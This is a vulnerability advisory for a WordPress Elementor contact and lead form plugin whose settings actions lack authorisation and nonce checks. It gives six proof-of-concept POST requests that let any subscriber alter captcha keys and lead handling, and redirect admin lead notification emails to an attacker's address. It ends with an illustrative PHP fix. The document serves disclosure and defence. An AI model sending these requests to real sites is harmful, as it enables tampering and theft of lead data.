wpexploit | Yoru Oni | WPEX-ID:DA87358A-3A72-4CF7-A2AF-A266DD9B4290
History: Feb 01, 2022 - 12:00 a.m.

Contact Form & Lead Form Elementor Builder Plugin < 1.7.4 - Multiple Subscriber+ Settings Update

Tags: wordpress, elementor, plugin, security, vulnerability, contact form, lead form, post request, captcha, site key, secret key, lead receiving method, user email notifications, admin email notifications, remember form

EPSS: 0 (Percentile: 14.0%)

The plugin does not perform authorisation or nonce checks, which could allow any authenticated user, such as a subscriber, to update and change various settings.

PoC POST Request (ON/OFF Captcha):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-on-off-setting=ON&captcha_on_off_form_id=2&action=SaveCaptchaOption


PoC POST Request (Captcha Settings: Site Key & Secret Key):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

captcha-setting-sitekey=YoruOni&captcha-setting-secret=YoruOni&captcha-keys=1&action=SaveCaptchaSettings


PoC POST Request (Lead Receiving Method):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

data-recieve-method=3&action-lead-setting=1&action=SaveLeadSettings


PoC POST Request (User Email Notifications):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

user_email_setting%5Bfrom%5D=yoruoni%40pm.me&user_email_setting%5Bheader%5D=New+Lead+Received&user_email_setting%5Bsubject%5D=Received+a+lead&user_email_setting%5Bmessage%5D=Form+Submitted+Successfully&user-email-setting-option=OFF&user_email_setting%5Bform-id%5D=1&action=SaveUserEmailSettings


PoC POST Request (Admin Email Notifications):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

email_setting%5Bto%5D=yoruoni%40pm.me&email_setting%5Bmultiple%5D=&email_setting%5Bfrom%5D=admin%40x14.tv&email_setting%5Bheader%5D=New+Lead+Received&email_setting%5Bsubject%5D=Form+Leads&email_setting%5Bmessage%5D=%5Blf-new-form-data%5D&email_setting%5Bform-id%5D=1&action=SaveEmailSettings


PoC POST Request (Remember this Form):

POST /wp-admin/admin-ajax.php HTTP/2
Cookie: [any authenticated user]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

form_id=1&action=RememberMeThisForm
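
The two checks the description says are missing, shown on a handler for the SaveCaptchaOption action as an added example (this is not the plugin's code or the vendor's patch). The handler name, nonce action, nonce field, option name and the ON/OFF allow-list are assumptions; the AJAX action and POST field names are the ones in the first PoC request.

```php
<?php
// Added illustration, not the plugin's own code.
// Hypothetical names: example_save_captcha_option, example_captcha_settings,
// the 'nonce' field and the example_captcha_state_* option.

add_action( 'wp_ajax_SaveCaptchaOption', 'example_save_captcha_option' );
// No wp_ajax_nopriv_ hook is registered, so logged-out visitors never reach the handler.

function example_save_captcha_option() {
    // 1. Nonce check: the settings page must send wp_create_nonce( 'example_captcha_settings' )
    //    in the 'nonce' field. Passing false as the third argument makes the function
    //    return false instead of dying, so a JSON error can be sent.
    if ( ! check_ajax_referer( 'example_captcha_settings', 'nonce', false ) ) {
        wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
    }

    // 2. Authorisation: a valid login is not enough. Subscribers are authenticated
    //    but do not hold manage_options, so they are rejected here.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Forbidden' ), 403 );
    }

    // 3. Validate the fields seen in the PoC before storing anything.
    $state = isset( $_POST['captcha-on-off-setting'] )
        ? sanitize_text_field( wp_unslash( $_POST['captcha-on-off-setting'] ) )
        : '';
    $form_id = isset( $_POST['captcha_on_off_form_id'] )
        ? absint( $_POST['captcha_on_off_form_id'] )
        : 0;

    // Assumption: only ON and OFF are valid states, and form ids are positive integers.
    if ( ! in_array( $state, array( 'ON', 'OFF' ), true ) || 0 === $form_id ) {
        wp_send_json_error( array( 'message' => 'Invalid input' ), 400 );
    }

    update_option( 'example_captcha_state_' . $form_id, $state );
    wp_send_json_success( array( 'form_id' => $form_id, 'captcha' => $state ) );
}
```

wp_send_json_error() ends the request, so each failed check stops execution before the setting is written. The same pair of checks applies to every other action listed in the PoC requests.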
